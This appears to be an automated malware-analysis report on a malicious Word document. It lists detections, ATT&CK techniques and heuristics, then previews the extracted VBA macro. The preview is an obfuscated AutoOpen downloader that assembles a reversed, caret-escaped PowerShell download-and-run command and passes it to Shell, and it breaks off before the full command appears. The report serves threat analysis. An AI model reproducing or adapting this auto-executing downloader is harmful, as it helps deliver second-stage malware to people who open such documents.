MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen subroutine is present, indicating that the macro will execute automatically when the document is opened. The script uses the Shell function to execute a command, likely to download and run a second-stage payload. The obfuscated nature of the script and the lack of clear indicators prevent definitive family attribution.
Heuristics 5
-
ClamAV: Doc.Downloader.00536d-6695627-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.00536d-6695627-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10214 bytes |
SHA-256: b0724a0dc4cab5fa737227f680e1fb1fca4dfc4678961e8a0415c61424672f64 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GRsEIKjQLIibp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim ourWAh(1)
ourWAh(0) = MidB("rPTzwFht", 2, 324)
Dim MmzQC(1)
MmzQC(0) = Mid("XREtw", 90, 350)
Dim TYMqRT(1)
TYMqRT(0) = Mid("sItCTh", 497, 794)
Dim INHuT(2)
INHuT(0) = MidB("jaKmO", 824, 674)
INHuT(1) = MidB("BTaAS", 249, 226)
Dim hKBYj(2)
hKBYj(0) = Left("zGZWM", 794)
hKBYj(1) = MidB("TSAbkj", 861, 394)
Dim XlQwlh(1)
XlQwlh(0) = Mid("CjviM", 583, 862)
Dim whiSsG(1)
whiSsG(0) = MidB("ilPtY", 619, 995)
wjrqG (KeyString(6 + 6 + 0 + 7 + 48) + ortUiZobb + UDHTNRz + rZvJQC + pTXjI + KinQEOZZUjti + HJuhLlcGQdlLV)
Dim scjipP(2)
scjipP(0) = Mid("huCNkOMt", 337, 293)
scjipP(1) = Mid("VuBaW", 922, 500)
Dim VjYvaT(1)
VjYvaT(0) = Left("fZuSIt", 470)
Dim wdblP(2)
wdblP(0) = MidB("SLBIENJ", 597, 869)
wdblP(1) = Mid("mwwzVnhU", 860, 570)
Dim IwGslQ(2)
IwGslQ(0) = Left("TYYWXup", 225)
IwGslQ(1) = MidB("kjOkJtPF", 838, 149)
End Sub
Function wjrqG(MNJRh As String)
Dim FnIOX(1)
FnIOX(0) = MidB("koJbTjs", 402, 858)
Dim bEpcmM(2)
bEpcmM(0) = Mid("qiPhA", 26, 571)
bEpcmM(1) = Right("tBTkOJWJ", 514)
Shell@ MNJRh, CInt(msoBarTypeNormal)
Dim zUwLAJ(2)
zUwLAJ(0) = MidB("lisXVT", 193, 349)
zUwLAJ(1) = MidB("ZWPiu", 514, 514)
Dim uBRYW(1)
uBRYW(0) = Right("OfVwp", 366)
Dim XoQDnH(2)
XoQDnH(0) = MidB("cqrBHiTF", 904, 281)
XoQDnH(1) = Right("LEQpRq", 198)
Dim HXfiX(2)
HXfiX(0) = MidB("tzUAIt", 607, 37)
HXfiX(1) = Left("MiWCrwsu", 972)
End Function
Attribute VB_Name = "UvFsXtOpslmDK"
Function ortUiZobb()
Dim odWOU(1)
odWOU(0) = MidB("dovBYn", 881, 559)
Dim rQmfhA(1)
rQmfhA(0) = Mid("nrDJaCH", 551, 327)
DFMwMznzTmP = "md" + " " + "/V^:" + "^O/" + "C" + ChrW(3 + 0 + 4 + 5 + 22) + "^s" + "e" + "t j^"
Dim JAPMk(2)
JAPMk(0) = MidB("rdGMTXv", 815, 829)
JAPMk(1) = MidB("ZwEVcwN", 42, 854)
BuTBoiDf = "L^" + "T= " + " ^" + " " + " " + " ^ ^" + " ^ " + " ^ ^" + " " + "^ " + " ^ " + "}^}" + "{^h"
Dim LciMmN(1)
LciMmN(0) = Mid("ivcYwj", 172, 378)
Dim aROrE(1)
aROrE(0) = Left("riBsbEWj", 20)
Dim EJjKE(2)
EJjKE(0) = Right("TQSKEzil", 262)
EJjKE(1) = Left("JQALh", 62)
Dim zbNGdF(1)
zbNGdF(0) = MidB("ZECMRjAz", 17, 773)
DPQRFAzuvwK = "cta" + "c" + "^}^;" + "^" + "kaer" + "^" + "b^;" + "V^"
Dim QwMXSA(2)
QwMXSA(0) = MidB("fRUriEiZ", 296, 670)
QwMXSA(1) = Left("soXcs", 703)
Dim jFoJzr(2)
jFoJzr(0) = Left("PYKZi", 427)
jFoJzr(1) = Mid("wKMQd", 276, 421)
Dim oGmqi(1)
oGmqi(0) = MidB("UsZYwXH", 631, 191)
Dim IYWRD(2)
IYWRD(0) = MidB("nEbZTT", 657, 836)
IYWRD(1) = Mid("VAZoK", 296, 803)
CriUE = "Dn$" + "^ ^" + "m" + "^e" + "^t" + "^I" + "-" + "ek^o" + "vn^I" + ";)V" + "D" + "n$^"
Dim pMPcGj(1)
pMPcGj(0) = Mid("rjfldZB", 25, 694)
AnhHVhwvXlf = " " + ",r" + "^j^" + "d$(" + "el^" + "i^" + "Fd^a" + "^oln" + "woD^" + ".I"
Dim CnQTF(1)
CnQTF(0) = MidB("dphiGSYi", 616, 272)
XfNlQDtdr = "^Y^o" + "^$^" + "{yr^" + "t" + "^{)R"
Dim Mutmz(1)
Mutmz(0) = MidB("ddUMK", 344, 142)
Dim CQtEz(2)
CQtEz(0) = Left("izhoINv", 824)
CQtEz(1) = Right("tQVzJzhl", 763)
Dim UppcwL(2)
UppcwL(0) = MidB("raYnaJ", 838, 815)
UppcwL(1) = MidB("wZtKjdu", 925, 238)
mrVLOCYJPck = "l" + "V" + "^$^" + " " + "n^i"
Dim WYnHl(2)
WYnHl(0) = Right("caiCIfl", 589)
WYnHl(1) = Mid("LwrzimZT", 896, 924)
wzYYNlz = " rj" + "^d$" + "(^h" + "caer" + "o^f" + ";^'^" + "exe." + "^'" + "+Q^" + "Qd^$" + "^+" + "^'^\" + "'^+"
ortUiZobb = DFMwMznzTmP + BuTBoiDf + DPQRFAzuvwK + CriUE + AnhHVhwvXlf + XfNlQDtdr + mrVLOCYJPck + wzYYNlz
Dim rHqNf(1)
rHqNf(0) = MidB("VnwRwbwF", 864, 219)
Dim WFwwS(1)
WFwwS(0) = MidB("YSZRQ", 397, 227)
Dim VfGpS(1)
VfGpS(0) = Left("LYuhWl", 363)
End Function
Function UDHTNRz()
Dim odoMaD(2)
odoMaD(0) = Left("bFhEnd", 121)
odoMaD(1) = R
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.